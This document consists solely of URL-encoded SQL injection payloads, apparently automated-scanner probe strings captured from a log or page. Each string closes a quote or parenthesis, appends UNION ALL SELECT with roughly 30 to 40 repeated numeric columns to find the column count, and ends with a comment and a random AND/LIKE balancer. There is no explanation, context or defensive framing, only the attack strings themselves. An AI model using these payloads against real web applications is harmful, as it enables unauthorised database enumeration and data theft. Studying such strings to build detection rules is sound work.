-3515%27%20UNION%20ALL%20SELECT%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621--%20%20AND%20%27igud%27%3D%27igud -1097%27%20UNION%20ALL%20SELECT%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554%2C%204554--%20%20AND%20%27wxOu%27%3D%27wxOu -8858%27%20UNION%20ALL%20SELECT%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163--%20%20AND%20%27CfLc%27%3D%27CfLc -5381%27%20UNION%20ALL%20SELECT%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081--%20%20AND%20%27GBEi%27%3D%27GBEi -9331%27%29%20UNION%20ALL%20SELECT%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365%2C%207365--%20%20AND%20%28%27kgLE%27%20LIKE%20%27kgLE -5752%27%29%20UNION%20ALL%20SELECT%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513--%20%20AND%20%28%27LVbF%27%20LIKE%20%27LVbF -4628%27%29%20UNION%20ALL%20SELECT%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542%2C%204542--%20%20AND%20%28%27BpfX%27%20LIKE%20%27BpfX -7137%27%29%20UNION%20ALL%20SELECT%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475--%20%20AND%20%28%27XroN%27%20LIKE%20%27XroN -8118%27%29%20UNION%20ALL%20SELECT%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275%2C%203275--%20%20AND%20%28%27gfqP%27%20LIKE%20%27gfqP -7495%27%29%20UNION%20ALL%20SELECT%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834%2C%209834--%20%20AND%20%28%27nltx%27%20LIKE%20%27nltx -2269%27%29%20UNION%20ALL%20SELECT%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342%2C%204342--%20%20AND%20%28%27QkFy%27%20LIKE%20%27QkFy -6664%27%29%20UNION%20ALL%20SELECT%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604%2C%202604--%20%20AND%20%28%27cALB%27%20LIKE%20%27cALB -1912%27%29%20UNION%20ALL%20SELECT%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089%2C%201089--%20%20AND%20%28%27AGdA%27%20LIKE%20%27AGdA -7353%27%29%20UNION%20ALL%20SELECT%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950--%20%20AND%20%28%27jkgA%27%20LIKE%20%27jkgA -8370%27%29%29%20UNION%20ALL%20SELECT%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756--%20%20AND%20%28%28%27yzxq%27%20LIKE%20%27yzxq -5936%27%29%29%20UNION%20ALL%20SELECT%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524%2C%209524--%20%20AND%20%28%28%27McjQ%27%20LIKE%20%27McjQ -4559%27%29%29%20UNION%20ALL%20SELECT%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336--%20%20AND%20%28%28%27UEEw%27%20LIKE%20%27UEEw -8953%27%29%29%20UNION%20ALL%20SELECT%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992--%20%20AND%20%28%28%27uVmr%27%20LIKE%20%27uVmr -3582%27%29%29%20UNION%20ALL%20SELECT%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681%2C%202681--%20%20AND%20%28%28%27KhjT%27%20LIKE%20%27KhjT -8410%27%29%29%20UNION%20ALL%20SELECT%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815%2C%203815--%20%20AND%20%28%28%27cgFG%27%20LIKE%20%27cgFG -5947%27%29%29%20UNION%20ALL%20SELECT%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300%2C%206300--%20%20AND%20%28%28%27Jbiy%27%20LIKE%20%27Jbiy -7575%27%29%29%20UNION%20ALL%20SELECT%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920%2C%209920--%20%20AND%20%28%28%27ZFWj%27%20LIKE%20%27ZFWj -7468%27%29%29%20UNION%20ALL%20SELECT%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431--%20%20AND%20%28%28%27gEUV%27%20LIKE%20%27gEUV -2325%27%29%29%20UNION%20ALL%20SELECT%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388--%20%20AND%20%28%28%27Dppe%27%20LIKE%20%27Dppe -5358%27%29%29%29%20UNION%20ALL%20SELECT%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582--%20%20AND%20%28%28%28%27xjtV%27%20LIKE%20%27xjtV -5842%27%29%29%29%20UNION%20ALL%20SELECT%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356%2C%207356--%20%20AND%20%28%28%28%27qRaD%27%20LIKE%20%27qRaD -7133%27%29%29%29%20UNION%20ALL%20SELECT%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974%2C%203974--%20%20AND%20%28%28%28%27SaHQ%27%20LIKE%20%27SaHQ -7090%27%29%29%29%20UNION%20ALL%20SELECT%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011--%20%20AND%20%28%28%28%27MWfF%27%20LIKE%20%27MWfF -7723%27%29%29%29%20UNION%20ALL%20SELECT%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982--%20%20AND%20%28%28%28%27bvxf%27%20LIKE%20%27bvxf -3640%27%29%29%29%20UNION%20ALL%20SELECT%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245--%20%20AND%20%28%28%28%27dPwJ%27%20LIKE%20%27dPwJ -6521%27%29%29%29%20UNION%20ALL%20SELECT%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526%2C%205526--%20%20AND%20%28%28%28%27jzJH%27%20LIKE%20%27jzJH -1922%27%29%29%29%20UNION%20ALL%20SELECT%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288%2C%208288--%20%20AND%20%28%28%28%27GEnm%27%20LIKE%20%27GEnm -6183%27%29%29%29%20UNION%20ALL%20SELECT%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282%2C%204282--%20%20AND%20%28%28%28%27Gcod%27%20LIKE%20%27Gcod -4772%27%29%29%29%20UNION%20ALL%20SELECT%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528--%20%20AND%20%28%28%28%27PzGi%27%20LIKE%20%27PzGi -6161%27%20UNION%20ALL%20SELECT%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606--%20%20AND%20%27djKu%27%20LIKE%20%27djKu -3827%27%20UNION%20ALL%20SELECT%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441--%20%20AND%20%27Fcpp%27%20LIKE%20%27Fcpp -8811%27%20UNION%20ALL%20SELECT%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733--%20%20AND%20%27llua%27%20LIKE%20%27llua -8728%27%20UNION%20ALL%20SELECT%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070%2C%206070--%20%20AND%20%27ySbS%27%20LIKE%20%27ySbS -5710%27%20UNION%20ALL%20SELECT%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186%2C%203186--%20%20AND%20%27FTAf%27%20LIKE%20%27FTAf -6547%27%20UNION%20ALL%20SELECT%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172--%20%20AND%20%27EwXy%27%20LIKE%20%27EwXy -5320%27%20UNION%20ALL%20SELECT%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850--%20%20AND%20%27MPlE%27%20LIKE%20%27MPlE -7718%27%20UNION%20ALL%20SELECT%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385%2C%202385--%20%20AND%20%27eRPx%27%20LIKE%20%27eRPx -9628%27%20UNION%20ALL%20SELECT%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617--%20%20AND%20%27tnad%27%20LIKE%20%27tnad -1071%27%20UNION%20ALL%20SELECT%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993%2C%201993--%20%20AND%20%27lrND%27%20LIKE%20%27lrND -1328%22%29%20UNION%20ALL%20SELECT%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304--%20%20AND%20%28%22LLsT%22%3D%22LLsT -9584%22%29%20UNION%20ALL%20SELECT%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067%2C%203067--%20%20AND%20%28%22eiXJ%22%3D%22eiXJ -6262%22%29%20UNION%20ALL%20SELECT%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926%2C%205926--%20%20AND%20%28%22gEfQ%22%3D%22gEfQ -6849%22%29%20UNION%20ALL%20SELECT%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975--%20%20AND%20%28%22twqA%22%3D%22twqA -6424%22%29%20UNION%20ALL%20SELECT%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711--%20%20AND%20%28%22tIDq%22%3D%22tIDq -8426%22%29%20UNION%20ALL%20SELECT%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362%2C%201362--%20%20AND%20%28%22fhmj%22%3D%22fhmj -7281%22%29%20UNION%20ALL%20SELECT%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291--%20%20AND%20%28%22vBqT%22%3D%22vBqT -1903%22%29%20UNION%20ALL%20SELECT%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742--%20%20AND%20%28%22lINR%22%3D%22lINR -3709%22%29%20UNION%20ALL%20SELECT%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474--%20%20AND%20%28%22gXxS%22%3D%22gXxS -1851%22%29%20UNION%20ALL%20SELECT%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684%2C%206684--%20%20AND%20%28%22JUzf%22%3D%22JUzf -4640%22%29%29%20UNION%20ALL%20SELECT%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901%2C%204901--%20%20AND%20%28%28%22wtNS%22%3D%22wtNS -7546%22%29%29%20UNION%20ALL%20SELECT%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225%2C%207225--%20%20AND%20%28%28%22bZaE%22%3D%22bZaE 